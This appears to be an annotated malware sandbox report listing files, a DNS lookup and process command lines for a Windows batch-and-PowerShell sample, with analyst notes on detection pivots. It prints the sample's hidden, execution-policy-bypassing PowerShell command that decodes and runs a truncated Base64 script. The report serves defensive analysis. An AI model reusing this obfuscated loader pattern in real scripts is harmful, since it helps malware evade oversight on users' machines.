Technical Information
- %TEMP%\pleurotusconidiabase.bat
- %HOMEPATH%\dwm.bat
- %TEMP%\ceopb8o9.0.cs
- %TEMP%\ceopb8o9.cmdline
- %TEMP%\ceopb8o9.out
- %TEMP%\csca4b7.tmp
- %TEMP%\resa4c7.tmp
- %TEMP%\ceopb8o9.dll
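(From here to the DNS entry the list repeats the ceopb8o9.* and *.tmp compiler temporaries already shown above. The sub-headings that separated the two lists appear to have been lost in extraction; presumably the first list is files created and this one is files deleted, which would leave only the two .bat files on disk. Confirm against the original report.)
- %TEMP%\resa4c7.tmp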
- %TEMP%\csca4b7.tmp
- %TEMP%\ceopb8o9.cmdline
- %TEMP%\ceopb8o9.0.cs
- %TEMP%\ceopb8o9.pdb
- %TEMP%\ceopb8o9.out
- %TEMP%\ceopb8o9.dll
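- DNS ASK co##############e-chains.prod.autograph.services.mozaws.net
  (Note: autograph.services.mozaws.net is a Mozilla-operated domain, and the masked label is consistent with Mozilla's content-signature service used by Firefox. This lookup is most likely background browser traffic from the analysis environment rather than malware infrastructure; verify before treating it as an indicator or blocking it.)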
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\PleurotusConidiaBase.bat" "
- '<SYSTEM32>\cmd.exe' /K "%TEMP%\PleurotusConidiaBase.bat"
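- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -noprofile -windowstyle hidden -ep bypass -Command ""iex([Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('CiRpZmthaT0kZW52OlVTRVJOQU1FCiR0c3Npcz0iQzpcVXNlcnNcJGlma2FpXGR3bS5iYXQiCml...
  (Note: the Base64 argument is truncated in this report. The visible portion decodes to two assignments, `$ifkai=$env:USERNAME` and `$tssis="C:\Users\$ifkai\dwm.bat"`, which matches the %HOMEPATH%\dwm.bat entry in the file list. The rest of the script is not shown. For detection, the combination of a hidden window, an execution-policy bypass, and `iex` over `FromBase64String` in the command line is a more durable signal than the file names.)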
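- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\ceopb8o9.cmdline"
  (Note: csc.exe started with /noconfig /fullpaths and an @response file under %TEMP%, followed by cvtres.exe, is consistent with C# being compiled at run time from a script, for example by PowerShell Add-Type. The ceopb8o9.* and *.tmp names are compiler temporaries and are likely to differ on each run, so the parent/child process chain is a better hunting pivot than these file names.)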
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RESA4C7.tmp" "%TEMP%\CSCA4B7.tmp"
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\PleurotusConidiaBase.bat" "' (with hidden window)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\ceopb8o9.cmdline"' (with hidden window)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RESA4C7.tmp" "%TEMP%\CSCA4B7.tmp"' (with hidden window)